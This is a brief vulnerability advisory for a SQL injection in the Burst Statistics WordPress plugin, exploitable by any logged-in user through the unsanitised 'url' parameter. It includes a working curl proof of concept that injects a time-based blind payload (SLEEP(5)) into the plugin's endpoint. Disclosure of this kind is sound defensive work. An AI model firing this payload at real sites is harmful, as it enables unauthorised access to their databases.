Description The plugins do not properly sanitise and escape the url parameter before using it in a SQL statement, leading to an SQL injection exploitable by any authenticated users, such as subscribers
curl ‘https://example.com/burst-statistics-endpoint.php’ \ -H ‘content-type: text/plain;charset=UTF-8’ \ --data-raw $‘"{\"fingerprint\":false,\"uid\":\"437a969907141c6c2042731efd2da038\",\"url\":\"https://example.com/abc\‘/**/OR/**/(SELECT/**/*/**/FROM/**/(SELECT/**/SLEEP(5))a)/**/OR/**/1=\’\\\“,\\\“time_on_page\\\”:6907,\\\“completed_goals\\\”:[]}”’ \ --compressed